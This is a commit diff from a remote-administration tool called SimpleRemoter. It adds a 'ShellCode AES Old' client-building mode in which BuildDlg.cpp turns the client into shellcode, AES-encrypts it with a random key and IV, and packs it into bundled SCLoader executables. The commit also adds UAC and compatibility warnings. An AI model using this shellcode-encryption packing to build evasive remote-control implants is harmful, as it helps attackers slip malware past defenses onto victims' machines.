admin/SimpleRemoter
1
0
Fork 0
mirror of https://github.com/yuanyuanxiang/SimpleRemoter.git synced 2026-01-24 16:23:11 +08:00
Code Issues Packages Projects Releases Wiki Activity

Use old shellcode+AES loader to build client for Windows Server

Browse Source
This commit is contained in:
yuanyuanxiang
2026-01-12 22:23:04 +01:00
parent 4e79d20828
commit 2c15b842ca
8 changed files with 63 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
common/commands.h
View File

@@ -591,6 +591,7 @@ enum ClientCompressType {
CLIENT_COMPRESS_UPX = 1, CLIENT_COMPRESS_UPX = 1,
CLIENT_COMPRESS_SC_AES = 2, CLIENT_COMPRESS_SC_AES = 2,
CLIENT_PE_TO_SEHLLCODE = 3, CLIENT_PE_TO_SEHLLCODE = 3,
CLIENT_COMPRESS_SC_AES_OLD = 4,
}; };
#pragma pack(push, 4) #pragma pack(push, 4)

BIN
server/2015Remote/2015Remote.rc
View File

Binary file not shown.

2
server/2015Remote/2015Remote_vs2015.vcxproj
View File

@@ -254,6 +254,8 @@
<None Include="res\My2015Remote.rc2" /> <None Include="res\My2015Remote.rc2" />
<None Include="res\pc.ico" /> <None Include="res\pc.ico" />
<None Include="res\rcedit.exe" /> <None Include="res\rcedit.exe" />
<None Include="res\SCLoader_32.exe" />
<None Include="res\SCLoader_64.exe" />
<None Include="res\string.ico" /> <None Include="res\string.ico" />
<None Include="res\upx.exe" /> <None Include="res\upx.exe" />
<None Include="stub2\stub32.bin" /> <None Include="stub2\stub32.bin" />

2
server/2015Remote/2015Remote_vs2015.vcxproj.filters
View File

@@ -221,6 +221,8 @@
<None Include="res\rcedit.exe" /> <None Include="res\rcedit.exe" />
<None Include="stub2\stub32.bin" /> <None Include="stub2\stub32.bin" />
<None Include="stub2\stub64.bin" /> <None Include="stub2\stub64.bin" />
<None Include="res\SCLoader_32.exe" />
<None Include="res\SCLoader_64.exe" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<Text Include="..\..\ReadMe.md" /> <Text Include="..\..\ReadMe.md" />

53
server/2015Remote/BuildDlg.cpp
View File

@@ -184,6 +184,13 @@ std::string ReleaseEXE(int resID, const char* name)
return r ? path : ""; return r ? path : "";
} }
typedef struct SCInfoOld {
unsigned char aes_key[16];
unsigned char aes_iv[16];
unsigned char data[4 * 1024 * 1024];
int len;
} SCInfoOld;
typedef struct SCInfo { typedef struct SCInfo {
unsigned char aes_key[16]; unsigned char aes_key[16];
unsigned char aes_iv[16]; unsigned char aes_iv[16];
@@ -480,6 +487,38 @@ void CBuildDlg::OnBnClickedOk()
int ret = pe_2_shellcode(strSeverFile.GetString(), strSeverFile.GetString()); int ret = pe_2_shellcode(strSeverFile.GetString(), strSeverFile.GetString());
if (ret)MessageBox(CString("ShellCode 转换异常, 异常代码: ") + CString(std::to_string(ret).c_str()), if (ret)MessageBox(CString("ShellCode 转换异常, 异常代码: ") + CString(std::to_string(ret).c_str()),
"提示", MB_ICONINFORMATION); "提示", MB_ICONINFORMATION);
} else if (m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC_AES_OLD) { // 兼容旧版本
DWORD dwSize = 0;
LPBYTE data = ReadResource(is64bit ? IDR_SCLOADER_X64_OLD : IDR_SCLOADER_X86_OLD, dwSize);
if (data) {
int iOffset = MemoryFind((char*)data, (char*)g_ConnectAddress.Flag(), dwSize, g_ConnectAddress.FlagLen());
if (iOffset != -1) {
SCInfoOld* sc = (SCInfoOld*)(data + iOffset);
LPBYTE srcData = (LPBYTE)szBuffer;
int srcLen = dwFileSize;
if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize, true)) {
generate_random_iv(sc->aes_key, 16);
generate_random_iv(sc->aes_iv, 16);
std::string key, iv;
for (int i = 0; i < 16; ++i) key += std::to_string(sc->aes_key[i]) + " ";
for (int i = 0; i < 16; ++i) iv += std::to_string(sc->aes_iv[i]) + " ";
Mprintf("AES_KEY: %s, AES_IV: %s\n", key.c_str(), iv.c_str());
struct AES_ctx ctx;
AES_init_ctx_iv(&ctx, sc->aes_key, sc->aes_iv);
AES_CBC_encrypt_buffer(&ctx, srcData, srcLen);
if (srcLen <= 4 * 1024 * 1024) {
memcpy(sc->data, srcData, srcLen);
sc->len = srcLen;
}
SAFE_DELETE_ARRAY(srcData);
PathRenameExtension(strSeverFile.GetBuffer(MAX_PATH), _T(".exe"));
strSeverFile.ReleaseBuffer();
BOOL r = WriteBinaryToFile(strSeverFile.GetString(), (char*)data, dwSize);
}
}
}
SAFE_DELETE_ARRAY(data);
} }
int size = m_SliderClientSize.GetPos() * 2.56 * 1024 * 1024; int size = m_SliderClientSize.GetPos() * 2.56 * 1024 * 1024;
if (size > 0) { if (size > 0) {
@@ -550,6 +589,7 @@ BOOL CBuildDlg::OnInitDialog()
m_ComboCompress.InsertString(CLIENT_COMPRESS_UPX, "UPX"); m_ComboCompress.InsertString(CLIENT_COMPRESS_UPX, "UPX");
m_ComboCompress.InsertString(CLIENT_COMPRESS_SC_AES, "ShellCode AES"); m_ComboCompress.InsertString(CLIENT_COMPRESS_SC_AES, "ShellCode AES");
m_ComboCompress.InsertString(CLIENT_PE_TO_SEHLLCODE, "PE->ShellCode"); m_ComboCompress.InsertString(CLIENT_PE_TO_SEHLLCODE, "PE->ShellCode");
m_ComboCompress.InsertString(CLIENT_COMPRESS_SC_AES_OLD, "ShellCode AES<Old>");
m_ComboCompress.SetCurSel(CLIENT_COMPRESS_NONE); m_ComboCompress.SetCurSel(CLIENT_COMPRESS_NONE);
m_ComboPayload.InsertString(Payload_Self, "载荷写入当前程序尾部"); m_ComboPayload.InsertString(Payload_Self, "载荷写入当前程序尾部");
@@ -669,6 +709,12 @@ void CBuildDlg::OnClientRunasAdmin()
m_runasAdmin = !m_runasAdmin; m_runasAdmin = !m_runasAdmin;
CMenu* SubMenu = m_MainMenu.GetSubMenu(0); CMenu* SubMenu = m_MainMenu.GetSubMenu(0);
SubMenu->CheckMenuItem(ID_CLIENT_RUNAS_ADMIN, m_runasAdmin ? MF_CHECKED : MF_UNCHECKED); SubMenu->CheckMenuItem(ID_CLIENT_RUNAS_ADMIN, m_runasAdmin ? MF_CHECKED : MF_UNCHECKED);
static bool warned = false;
if (m_runasAdmin && !warned) {
warned = true;
MessageBox("安装Windows服务必须设置客户端运行时会请求管理员权限可能会触发系统UAC提示。\n"
"如果未设置,则程序会以当前用户的权限运行,通常也能安装成功。", "提示", MB_ICONINFORMATION);
}
} }
@@ -676,6 +722,13 @@ void CBuildDlg::OnCbnSelchangeComboCompress()
{ {
m_ComboPayload.ShowWindow(m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC_AES ? SW_SHOW : SW_HIDE); m_ComboPayload.ShowWindow(m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC_AES ? SW_SHOW : SW_HIDE);
m_StaticPayload.ShowWindow(m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC_AES ? SW_SHOW : SW_HIDE); m_StaticPayload.ShowWindow(m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC_AES ? SW_SHOW : SW_HIDE);
m_ComboPayload.SetFocus();
static bool warned = false;
if (m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC_AES && !warned) {
warned = true;
MessageBoxA(_T("使用 ShellCode AES 在程序尾部追加载荷,可能无法在某些系统运行! 需切换为 ShellCode AES Old 模式生成!"),
"提示", MB_ICONWARNING);
}
} }
BOOL CBuildDlg::OnToolTipNotify(UINT id, NMHDR* pNMHDR, LRESULT* pResult) BOOL CBuildDlg::OnToolTipNotify(UINT id, NMHDR* pNMHDR, LRESULT* pResult)

BIN
server/2015Remote/res/SCLoader_32.exe Normal file
View File

Binary file not shown.

BIN
server/2015Remote/res/SCLoader_64.exe Normal file
View File

Binary file not shown.

7
server/2015Remote/resource.h
View File

@@ -195,6 +195,9 @@
#define IDB_BITMAP_PORTPROXY 317 #define IDB_BITMAP_PORTPROXY 317
#define IDD_TOOLBAR_DLG 318 #define IDD_TOOLBAR_DLG 318
#define IDD_DIALOG_FILESEND 320 #define IDD_DIALOG_FILESEND 320
#define IDR_SCLOADER_X86_OLD 322
#define IDR_BINARY7 323
#define IDR_SCLOADER_X64_OLD 323
#define IDC_MESSAGE 1000 #define IDC_MESSAGE 1000
#define IDC_ONLINE 1001 #define IDC_ONLINE 1001
#define IDC_STATIC_TIPS 1002 #define IDC_STATIC_TIPS 1002
@@ -619,10 +622,10 @@
#define ID_EXIT_FULLSCREEN 40001 #define ID_EXIT_FULLSCREEN 40001
// Next default values for new objects // Next default values for new objects
// //
#ifdef APSTUDIO_INVOKED #ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS #ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 322 #define _APS_NEXT_RESOURCE_VALUE 324
#define _APS_NEXT_COMMAND_VALUE 32995 #define _APS_NEXT_COMMAND_VALUE 32995
#define _APS_NEXT_CONTROL_VALUE 2222 #define _APS_NEXT_CONTROL_VALUE 2222
#define _APS_NEXT_SYMED_VALUE 105 #define _APS_NEXT_SYMED_VALUE 105